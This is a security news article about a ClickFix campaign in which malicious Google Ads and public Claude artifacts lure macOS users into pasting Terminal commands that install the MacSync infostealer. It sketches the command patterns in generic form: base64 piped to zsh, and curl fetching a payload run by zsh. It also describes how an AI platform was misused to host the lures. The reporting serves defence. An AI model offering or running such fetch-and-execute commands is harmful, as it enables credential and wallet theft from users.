ClickFix Campaign Exploits Claude Artifacts and Google Ads to Deploy MacSync Infostealer on macOS

Threat actors are leveraging public Claude artifacts and malicious Google Ads in an evolving ClickFix campaign designed to compromise macOS users. Researchers from Moonlock Lab and AdGuard report that attackers are tricking victims into copying and pasting malicious shell commands into Terminal, ultimately installing the MacSync infostealer.

The campaign blends social engineering with search engine manipulation, directing users to what appear to be legitimate troubleshooting guides or support instructions. Instead of solving technical issues, these guides deliver malware through carefully disguised command-line payloads.

Analysts observed thousands of views on the malicious instructions, indicating that the campaign has achieved significant reach.

From Google Search to Terminal Execution

Malicious Google Search results reportedly lead users either to public Claude artifacts or to fake Apple Support-style pages. These pages instruct users to run Terminal commands under the guise of resolving system errors or enabling software features.

The attack relies heavily on trust. By hosting content on legitimate-looking platforms and embedding it in search results, threat actors reduce suspicion and increase the likelihood that users will follow the instructions.

Once the victim copies the command into Terminal, the compromise begins.

Two Variants, One Objective

Researchers identified at least two primary attack variants. One variant uses a base64-encoded payload piped directly into zsh via commands resembling echo "..." | base64 -D | zsh.

The second variant uses a curl command to fetch a remote payload and execute it with zsh, a technique frequently seen in macOS-targeted malware campaigns.

Despite differences in delivery method, both approaches ultimately download and execute a loader responsible for installing the MacSync infostealer.

Both variants were observed retrieving second-stage components from the same command-and-control infrastructure.

Inside the MacSync Infostealer

Once deployed, MacSync leverages AppleScript to access sensitive data stored on the infected device. This includes macOS Keychain credentials, browser-stored passwords, session cookies, and cryptocurrency wallet data.

Infostealers targeting macOS have grown more sophisticated in recent years, reflecting the increasing value of Apple user ecosystems to cybercriminal groups.

By harvesting authentication tokens and wallet credentials, attackers can bypass multi-factor authentication protections and directly monetize stolen assets.

Indicators Point to a Single Actor

Moonlock Lab and AdGuard researchers observed view counts between 12,300 and 15,600 on the malicious guides, suggesting sustained exposure.

Technical analysis revealed that both identified variants retrieved second-stage payloads from the same command-and-control servers, strongly indicating the activity is linked to a single threat actor or coordinated group.

The consistency in infrastructure, payload design, and social engineering themes supports this attribution hypothesis.

Defensive Recommendations for macOS Users

Security experts stress that users should never execute unfamiliar Terminal commands provided by web pages, especially when prompted through search results or unofficial guides.

Before running any command, users are advised to verify its legitimacy through trusted documentation or by consulting a reputable security resource.

One defensive strategy is to paste the suspicious command into a trusted analysis tool or query it directly with the same large language model session in which it was generated, asking for a security explanation before execution.

As attackers increasingly weaponize legitimate AI platforms and search advertising channels, vigilance at the user level remains a critical line of defense.